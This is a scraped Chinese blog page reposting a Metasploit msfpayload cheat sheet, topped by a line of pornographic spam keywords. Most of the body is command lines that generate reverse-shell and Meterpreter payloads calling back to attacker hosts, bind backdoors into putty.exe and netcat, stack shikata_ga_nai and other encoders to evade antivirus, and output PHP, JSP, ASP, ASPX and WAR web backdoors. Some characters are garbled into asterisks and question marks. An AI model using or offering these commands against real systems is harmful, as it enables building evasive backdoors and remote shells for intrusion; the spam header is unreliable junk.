日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

msf payload php,Metasploit(四)--Msfpayload命令

發布時間:2023/12/4 php 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 msf payload php,Metasploit(四)--Msfpayload命令 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

msfpayload即將在2015年6月18日棄用,用msfvenmon替代

msfpayload?-h

msfpayload的幫助信息。

msfpayload?-l?|?grep?windows

msfpayload?-l?|?grep?linux

msfpayload?-l?|?grep?andriod

列出某個平臺的pyloads

msfpayload?windows/meterpreter/bind_tcp?S

查看需要設置參數

msfpayload?windows/meterpreter/bind_tcp?O

列出所有windows/meterpreter/bind_tcp下可用的***載荷的配置項(任何***載荷都是可用配置的)。

msfpayload?windows/meterpreter/reverse_tcp?LHOST=IP?LPORT=PORT?X?>?payload.exe

創建一個metasploit的reverse_tcp***載荷,回連到LHOSTip的LPORT,將其保存為名為payload.exe的windows下可執行程序。

msfpayload?windows/meterpreter/reverse_tcp?LHOST=IP?LPORT=PORT?R?>?payload.raw

創建一個metasploit的reverse_tcp***載荷,回連到LHOSTip的LPORT,將其保存為名payload.raw,該文件后面的msffencode中使用。

msfpayload?windows/meterpreter/reverse_tcp?LPORT=PORT?C?>?payload.c

創建一個metasploit的reverse_tcp***載荷,導出C格式的shellcode。

msfpayload?windows/meterpreter/reverse_tcp?LPORT=PORT?J?>?payload.java

創建一個metasploit的reverse_tcp***載荷,導出成以%u編碼方式的javaScript語言字符串。

msfpayload與可執行文件幫頂,如netcat

root@bt:~#?msfpayload?linux/x86/shell_reverse_tcp?EXITFUNC=thread?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-a?x86?-e?x86/alpha_mixed?-k?-x?/bin/netcat?-t?elf?-o?nc

msfpayload生成linux backdooroot@bt:~#?msfpayload?linux/x86/shell_reverse_tcp?LHOST=192.168.7.102?LPORT=5555?X?>?linux2

msfpayload生成exe backdoorroot@bt:~#msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.1.1.1?LPORT=5555?R?|?msfencode?-t?exe?-c?5?>?/root/Desktop/door.exe

root@bt:~#msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.1.1.1?LPORT=5555?R?|?msfencode?-t?exe?-c?5?-k?-x?/root/putty.exe?-o?/root/Desktop/puttydoor.exe

root@bt:~#msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?x86/shikata_ga_nai?-t?raw?-a?x86?-b?'\x00\x0a\x0d'?-c?10?X?>?shell.bin

root@bt:~#msfpayload?windows/shell/reverse_tcp??LHOST=10.0.0.1?LPORT=4443?EXITFUNC=thread?R?|??msfencode?-e?x86/shikata_ga_nai?-c?2?-t?raw?|?msfencode?-e?x86/jmp_call_additive?-c?2?-t?raw?|?msfencode?-e?x86/call4_dword_xor??-c?2?-t?raw?|?msfencode?-e?x86/jmp_call_additive?-c?2?-t?raw?|?msfencode?-e?x86/call4_dword_xor??-c?2?-t?exe?-o?door.exe

msfpayload生成jsp backdooroot@bt:~#?msfpayload?java/jsp_shell_reverse_tcp?LHOST=10.1.1.1?LPORT=5555?R?>?door.jsp

msfpayload生成war backdoo

root@bt:~#?msfpayload?linux/x86/shell_reverse_tcp?LHOST=10.0.0.1?LPORT=5555?W?>?door.war

msfpayload生成php backdoor

root@bt:~#?msfpayload?php/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?php/base64?-t?raw?-o?base64php.php

msfpayload生成asp backdoorroot@bt:~#?msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?x86/shikata_ga_nai?-a?x86??-t?asp?-o?door2.asp

msfpayload生成aspx backdoor

root@bt:~#?msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?x86/shikata_ga_nai?-a?x86??-t?aspx?-o?door.aspx

目標是內網時,常用的payload選著如:root@bt:~#?msfpayload?windows/meterpreter/reverse_tcp_allports?LHOST=192.168.1.6?R?|?msfencode?-e?x86/shikata_ga_nai?-c?3?-t?exe?-o?allports.exe

root@bt:~#?msfpayload?windows/meterpreter/reverse_http?LHOST=192.168.1.6?R?|?msfencode?-e?x86/shikata_ga_nai?-c?3?-t?exe?-o?httpports.exe

總結

以上是生活随笔為你收集整理的msf payload php,Metasploit(四)--Msfpayload命令的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。